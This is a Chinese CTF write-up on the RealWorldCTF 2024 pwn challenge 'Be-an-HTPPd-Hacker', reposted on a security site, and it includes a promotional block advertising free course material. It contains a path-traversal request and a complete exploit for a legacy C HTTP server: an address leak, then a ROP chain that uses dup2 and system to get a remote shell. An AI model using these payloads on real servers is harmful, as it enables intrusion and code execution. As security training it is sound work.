长亭百川云 - 文章详情

深入解析RealWorldCTF 2024体验赛PWN方向题目

蚁景科技

37

2024-03-05

前言

本报告旨在对RealWorldCTF 2024体验赛中的Pwn方向题目——"Be-an-HTPPd-Hacker"进行深入解析和讲解。该题目涉及一个十一年前的项目,其基于C语言实现了HTTP协议。我们将通过对该协议进行栈溢出攻击,探索真实世界中的攻击手法,并从中学习更多有用的攻击技巧,以提升我们的安全水平。通过理解攻击原理和方法,我们能够更好地理解安全防御的重要性,并为未来的安全工作做好准备。本报告将详细介绍攻击过程,希望能为读者提供深入而有价值的学习体验。

搜索字符串,github找源码

从IDA中,shift+F12提取,得到字符串,在github进行搜索能够得到源码在这:

https://github.com/bnlf/httpd/blob/943cb06a09eb553096956b2e394b8366124e0aac/src/httpd.c

具体构造

构造的代码如下,也就是方法 地址 加协议:

method, uri, vProtocol

如 POST www.baidu.comxxx

源码如下:

request parseRequest(char buffer[]) {
char *ptr = buffer;
char method[MAXLINE], uri[MAXLINE], vProtocol[MAXLINE];
request req;

sscanf(ptr, "%s %s %s", method, uri, vProtocol);
​
// Somente GET ou POST
if(strcasecmp(method, "GET") == 0)
req.method = "GET";
else if (strcasecmp(method, "POST") == 0)
req.method = "POST";
else {
req.method = "INVALID";
req.vProtocol = "INVALID";
req.uri[0] = '\0';
return req;
}
​
// Sera testado futuramente. Por Enquanto aceita que é um uri valido
req.uri = uri;

if(strcasecmp(vProtocol, "HTTP/1.0") == 0)
req.vProtocol = "HTTP/1.0";
else if (strcasecmp(vProtocol, "HTTP/1.1") == 0)
req.vProtocol = "HTTP/1.1";
else
req.vProtocol = "HTTP/1.1"; // se nao especificado
​
return req;
}
​

GET路径穿越

其中get请求,经过简单尝试和逆向发现存在路径穿越,其直接对WWW进行拼接读取。

else if (res.status == 200 ) // Ok
{
return sendFile(req, res,connfd);
}

阅读源码发现如上。

> 路径穿越漏洞(Path Traversal Vulnerability)是一种常见的安全漏洞,通常发生在Web应用程序或文件系统中。它允许攻击者访问他们没有权限访问的文件或目录,通过修改文件路径来绕过应用程序的访问控制机制。

不过flag没有可读权限,只能通过readflag来执行。

from evilblade import *
​
context(os='linux', arch='amd64')
# context(os='linux', arch='amd64', log_level='debug')
#GET /index.html HTTP/1.1
setup('./pwn')
libset('./libc.so.6')
rsetup('127.0.0.1',33333)
# rsetup('121.40.246.203',30594)
# pause()
payload = 'GET ' + '/img/../../../etc/profile  HTTP/1.0\x00'
# payload = b'POST /form-example.html/../img/../../../add HTTP/1.1\r\n'
pause()
sl(payload)
​
ia()
​

这是路径穿越读/etc/profile。

image-20240213113727166

POST栈溢出

其实不是源码也分析的差不多了,就是不太理解这个&=的分割,还有会存在一个奇怪的堆溢出,堆溢出主要是因为malloc大小引起的,在计算

char *line = (char*) malloc(end-start);

中,end出现小于start的情况。我们可以输入多个\n来使得heap足够大,避免溢出的情况。

代码可以看到:

int sendPostMessage(request req, response res, int connfd, char *linePost){
​
char buffer[MAXLINE];

//Prepara cabecalho HTML
sprintf(buffer, "<title>Submitted Form</title>");

//Cria body
strcat(buffer, "<h1>Received variables</h1><br>");
​
strcat(buffer, "");

char * pch;
char temp[250];
​
pch = strtok (linePost,"&amp;=");
​
while (pch != NULL)
{
sprintf(temp, "", pch);
strcat(buffer, temp);
​
pch = strtok (NULL, "&amp;=");
​
sprintf(temp, "", pch);
strcat(buffer, temp);
​
pch = strtok (NULL, "&amp;=");
​
}
​
//Fecha body e html
strcat(buffer, "<table><tbody><tr><th>Variables</th><th>Values</th></tr><tr><td>%s</td><td>%s</td></tr></tbody></table>");
​
sendHeader(connfd, req, res, "OK", "text/html");
​
write(connfd, buffer, strlen(buffer));
​
return 0;
}

也就是会根据&或者=分割之后,进行连接到temp。

【----帮助网安学习,以下所有学习资料免费领!加vx:dctintin,备注“freebuf”获取!】

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC漏洞分析报告

④ 150+网安攻防实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集(含答案)

⑧ APP客户端安全检测指南(安卓+IOS)

其中linepost如下:

void httpd(int connfd) {
​

char buffer[MAXLINE]; // Buffer dos dados de input
char fileBuffer[MAXLINE];
request req; // Pedido do cliente
response res; // Resposta do servidor
struct stat st;
int n;
int sizeContent = -1;
​
// Le o que está vindo no socket
n=read(connfd, buffer, MAXLINE);

int i = strlen(buffer);
char options[MAXLINE];
int statusRead = 0;
strcpy(options, buffer);
​
while(statusRead == 0)
{
if((options[i-3] == '\n' &amp;&amp; options[i-1] == '\n') || options[i-1] != '\n')
{
statusRead = 1;
}
else
{
n=read(connfd, options, MAXLINE);
//strcat(buffer, options);
//printf("%s\n", buffer);
i = strlen(options);
​
if(options[0] == '\r' &amp;&amp; options[1] == '\n' &amp;&amp; n == 2)
statusRead = 1;
}
}
​
// Faz o parse da requisicao
req = parseRequest(buffer);
​
char *linePost;
​
//Encontra no buffer o tamanho do conteudo
if(strcmp(req.method, "POST") ==0)
{
linePost = getLastLineRead(buffer);
}
//……
char *getLastLineRead(char *buffer) {
​
int numLines = 0;
int start = 0;
int end = 0;
int bufSize = strlen(buffer);

int i = 0;
int j = 0;
​
for (i=0;i")
stack = u32(rv(4))
dx(stack)
ld = u32(rv(4))-0xc0c
dx(ld)
libc = u32(rv(4))-2324400
dx(libc)
​
ia()

泄漏得到:

​
---------------
your stack is &gt;&gt;&gt; 0xff9c9f0a
---------------
​
---------------
your ld is &gt;&gt;&gt; 0xedf40000
---------------
​
---------------
your libc is &gt;&gt;&gt; 0xedcca000
---------------

构造ROP

从这个部分可以发现,会将原本的内容根据&=分割,然后加上之类的字符串,使得字符串长度变大,会导致栈溢出。那么我们根据前面得到的基地址,和这个部分漏洞进行ROP构造,从而getshell。

char * pch;
char temp[250];
​
pch = strtok (linePost,"&amp;=");
while (pch != NULL)
{
sprintf(temp, "%s", pch);
strcat(buffer, temp);
​
pch = strtok (NULL, "&amp;=");
​
sprintf(temp, "%s", pch);
strcat(buffer, temp);
​
pch = strtok (NULL, "&amp;=");
​
}

做以下构造,经过多次尝试终于得到了控制返回地址为xxxx:

from evilblade import *
​
context(os='linux', arch='amd64')
​
setup('./pwn')
libset('./libc.so.6')
​
rsetup('127.0.0.1',33333)
payload = b'POST '+ b'A='*1850
​
#test= cyclic(0x700).decode()
#modified_test = ''.join(['=' if (i) % 5 == 0 else test[i] for i in range(len(test))])
#d(modified_test)
​
payload = b'POST / A\n'+ b"A"*2400 + b"\n"
payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv=acwa=cxaa=yaac=aadb=adca=ddaa=eaad=aadg=adha=diaa=jaad=aadl=adma=dnaa=oaad=aadq=adra=dsaa=taad=aadv=adwa=dxaa=yaad=aaeb=aeca=edaa=eaae=aaeg=aeha=eiaa=jaae=aael=aema=enaa=oaae=aaeq=aera=esaa=taae=aaev=aewa=exaa=yaae=aafb=afca=fdaa=eaaf=aafg=afha=fiaa=jaaf=aafl=afma=fnaa=oaaf=aafq=afra=fsaa=taaf=aafv=afwa=fxaa=yaaf=aagb=agca=gdaa=eaag=aagg=agha=giaa=jaag=aagl=agma=gnaa=oaag=aagq=agra=gsaa=taag=aagv=agwa=gxaa=yaag=aahb=ahca=hdaa=eaah=aahg=ahha=hiaa=jaah=aahl=ahma=hnaa=oaah=aahq=ahra=hsaa=taah=aahv=ahwa=hxaa=yaah=aaib=aica=idaa=eaai=aaig=aiha=iiaa=jaai=aail=aima=inaa=oaai=aaiq=aira=isaa=taai=aaiv=aiwa=ixaa=yaai=aajb=ajca=jdaa=eaaj=aajg=ajha=jiaa=jaaj=aajl=ajma=jnaa=oaaj=aajq=ajra=jsaa=taaj=aajv=ajwa=jxaa=yaaj=aakb=akca=kdaa=eaak=aakg=akha=kiaa=jaak=aakl=akma=knaa=oaak=aakq=akra=ksaa=taak=aakv=akwa=kxaa=yaak=aalb=alca=ldaa=eaal=aalg=pppp"
payload += b"=" + p32(0xeb029050)*10+ b"xxxx" + b"="
d(payload)
dpx('len',len(payload))
pause()
sd(payload)

其中xxxx为任意地址,可以返回!

image-20240213222234157

由于 sprintf的原因,不能输入\x00和\n之类的作为rop,我这里采取加减法的方式进行绕过,先输入不包含0和0a的字符,后续根据加减恢复到我们需要的字符。

搜索有:

pwndbg&gt; search -4 0x11111111
Searching for value: b'\x11\x11\x11\x11'
libc.so.6 &nbsp; &nbsp; &nbsp; 0xf0ca28f4 0x11111111
libc.so.6 &nbsp; &nbsp; &nbsp; 0xf0ca2a08 0x11111111
libc.so.6 &nbsp; &nbsp; &nbsp; 0xf0ca2a0c 0x11111111
​
计算得到:
λ ~/ python
Python 3.11.6 (main, Nov 14 2023, 09:36:21) [GCC 13.2.1 20230801] on linux
Type "help", "copyright", "credits" or "license" for more information.
&gt;&gt;&gt; hex(0xf0ca28f4 -0xf0af1000)
'0x1b18f4'#这是libc偏移
&gt;&gt;&gt; hex(0x100000000-0x11111111)
'0xeeeeeeef'
&gt;&gt;&gt;

那么我们用以上作为差值计算,其中0x11111111+0xeeeeeeef相加等于0。

构造的ROP如下:

push_esi = p32(libc+0x00061c0d) # push esi ; ret
nop_ret = p32(libc+0x0002fce8) # nop ; ret
read = p32(symoff("read",libc))
pop_ebx = p32(0x0002c01f+libc) # pop ebx ; ret
add_ebx = p32(0x001959c2 +libc)# add ebx, eax ; add eax, 2 ; ret)
pop_eax = p32(libc+0x0002ed92)#: pop eax ; ret)
add_ecx = p32(libc+0x000b4fd3) # : add ecx, dword ptr [ebx + 0x5f082444] ; ret)
​
# dup2($ebx,$ecx)
rop = &nbsp;pop_esi + dup22
rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)
rop += pop_ecx_eax + p32(0xeeeeeeef)*2
rop += add_ecx #$ecx = 0
rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)
rop += add_ebx #$ebx = 4
rop += push_esi
​
rop += pop_esi + dup22
rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)
rop += pop_ecx_eax + p32(0xeeeeeeef+0x1)*2
rop += add_ecx #$ecx=1
rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)
rop += add_ebx #$ebx = 4
rop += push_esi
rop += p32(symoff("system",libc)) + p32(0xdeadbef) + p32(libc+0x001bd0d5)
if b"=" in rop or b"\x00" in rop:
print("stop!")
pause()
​
payload = b'POST '+ b"A"*2400 + b"\n"
payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv=acwa=cxaa=yaac=aadb=adca=ddaa=eaad=aadg=adha=diaa=jaad=aadl=adma=dnaa=oaad=aadq=adra=dsaa=taad=aadv=adwa=dxaa=yaad=aaeb=aeca=edaa=eaae=aaeg=aeha=eiaa=jaae=aael=aema=enaa=oaae=aaeq=aera=esaa=taae=aaev=aewa=exaa=yaae=aafb=afca=fdaa=eaaf=aafg=afha=fiaa=jaaf=aafl=afma=fnaa=oaaf=aafq=afra=fsaa=taaf=aafv=afwa=fxaa=yaaf=aagb=agca=gdaa=eaag=aagg=agha=giaa=jaag=aagl=agma=gnaa=oaag=aagq=agra=gsaa=taag=aagv=agwa=gxaa=yaag=aahb=ahca=hdaa=eaah=aahg=ahha=hiaa=jaah=aahl=ahma=hnaa=oaah=aahq=ahra=hsaa=taah=aahv=ahwa=hxaa=yaah=aaib=aica=idaa=eaai=aaig=aiha=iiaa=jaai=aail=aima=inaa=oaai=aaiq=aira=isaa=taai=aaiv=aiwa=ixaa=yaai=aajb=ajca=jdaa=eaaj=aajg=ajha=jiaa=jaaj=aajl=ajma=jnaa=oaaj=aajq=ajra=jsaa=taaj=aajv=ajwa=jxaa=yaaj=aakb=akca=kdaa=eaak=aakg=akha=kiaa=jaak=aakl=akma=knaa=oaak=aakq=akra=ksaa=taak=aakv=akwa=kxaa=yaak=aalb=alca=ldaa=eaal=aalg=pppp"
payload += b"=" + (nop_ret)*10
payload += rop
payload += b"="
​

完整exp如下:

from evilblade import *
​
context(os='linux', arch='amd64')
​
setup('./pwn')
libset('./libc.so.6')
​
rsetup('127.0.0.1',33333)
payload = b'POST '+ b'A'*3982 + b'\n'
sl(payload)
​
ru("Values")
stack = u32(rv(4))-0x1ed0a
dx(stack)
ld = u32(rv(4))-0xc0c
dx(ld)
libc = u32(rv(4))-2324400
dx(libc)
​
close()
rsetup('127.0.0.1',33333)
payload = b'POST '+ b'A='*1850
​
#test= cyclic(0x700).decode()
#modified_test = ''.join(['=' if (i) % 5 == 0 else test[i] for i in range(len(test))])
#d(modified_test)
​
​
sub_eax_ecx = p32(libc + 0x0018b0f8) # sub eax, ecx ; ret
push_eax = p32(libc + 0x00036a7d) # push eax ; ret
pop_ecx_eax = p32(libc + 0x001280f4) # pop ecx ; pop eax ; ret
dup22 = p32(symoff("dup2",libc)+0xe)
push_edx = p32(libc+0x00192ac8) # push edx ; ret
pop_edx = p32(libc+0x00037375) # pop edx ; ret
pop_esi = p32(libc+0x00021479) # pop esi ; ret
push_esi = p32(libc+0x00061c0d) # push esi ; ret
nop_ret = p32(libc+0x0002fce8) # nop ; ret
read = p32(symoff("read",libc))
pop_ebx = p32(0x0002c01f+libc) # pop ebx ; ret
add_ebx = p32(0x001959c2 +libc)# add ebx, eax ; add eax, 2 ; ret)
pop_eax = p32(libc+0x0002ed92)#: pop eax ; ret)
add_ecx = p32(libc+0x000b4fd3) # : add ecx, dword ptr [ebx + 0x5f082444] ; ret)
# dup2($ebx,$ecx)
rop = &nbsp;pop_esi + dup22
rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)
rop += pop_ecx_eax + p32(0xeeeeeeef)*2
rop += add_ecx #$ecx = 0
rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)
rop += add_ebx #$ebx = 4
rop += push_esi
​
rop += pop_esi + dup22
rop += pop_ebx + p32(libc+0x1b18f4-0x5f082444)
rop += pop_ecx_eax + p32(0xeeeeeeef+0x1)*2
rop += add_ecx #$ecx=1
rop += pop_ebx + p32(0xeeeeeeef) + pop_eax + p32(0x11111111+0x4)
rop += add_ebx #$ebx = 4
rop += push_esi
rop += p32(symoff("system",libc)) + p32(0xdeadbef) + p32(libc+0x001bd0d5)
if b"=" in rop or b"\x00" in rop:
print("stop!")
pause()
​
payload = b'POST '+ b"A"*2400 + b"\n"
payload += b"=aaxxca=adaaaaa=eaaaa=aaag=aaha=aiaa=jaaa=aaal=aama=anaa=oaaa=aaaq=aara=asaa=taaa=aaav=aawa=axaa=yaaa=aabb=abca=bdaa=eaab=aabg=abha=biaa=jaab=aabl=abma=bnaa=oaab=aabq=abra=bsaa=taab=aabv=abwa=bxaa=yaab=aacb=acca=cdaa=eaac=aacg=acha=ciaa=jaac=aacl=acma=cnaa=oaac=aacq=acra=csaa=taac=aacv=acwa=cxaa=yaac=aadb=adca=ddaa=eaad=aadg=adha=diaa=jaad=aadl=adma=dnaa=oaad=aadq=adra=dsaa=taad=aadv=adwa=dxaa=yaad=aaeb=aeca=edaa=eaae=aaeg=aeha=eiaa=jaae=aael=aema=enaa=oaae=aaeq=aera=esaa=taae=aaev=aewa=exaa=yaae=aafb=afca=fdaa=eaaf=aafg=afha=fiaa=jaaf=aafl=afma=fnaa=oaaf=aafq=afra=fsaa=taaf=aafv=afwa=fxaa=yaaf=aagb=agca=gdaa=eaag=aagg=agha=giaa=jaag=aagl=agma=gnaa=oaag=aagq=agra=gsaa=taag=aagv=agwa=gxaa=yaag=aahb=ahca=hdaa=eaah=aahg=ahha=hiaa=jaah=aahl=ahma=hnaa=oaah=aahq=ahra=hsaa=taah=aahv=ahwa=hxaa=yaah=aaib=aica=idaa=eaai=aaig=aiha=iiaa=jaai=aail=aima=inaa=oaai=aaiq=aira=isaa=taai=aaiv=aiwa=ixaa=yaai=aajb=ajca=jdaa=eaaj=aajg=ajha=jiaa=jaaj=aajl=ajma=jnaa=oaaj=aajq=ajra=jsaa=taaj=aajv=ajwa=jxaa=yaaj=aakb=akca=kdaa=eaak=aakg=akha=kiaa=jaak=aakl=akma=knaa=oaak=aakq=akra=ksaa=taak=aakv=akwa=kxaa=yaak=aalb=alca=ldaa=eaal=aalg=pppp"
payload += b"=" + (nop_ret)*10
payload += rop
payload += b"="
​
​
d(payload)
dpx('len',len(payload))
dpx("begin",uu64(pop_esi))
dpx("nop",uu64(nop_ret))
dx(stack)
pause()
sd(payload)
​
ia()

攻击结果:

image-20240214140648135

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2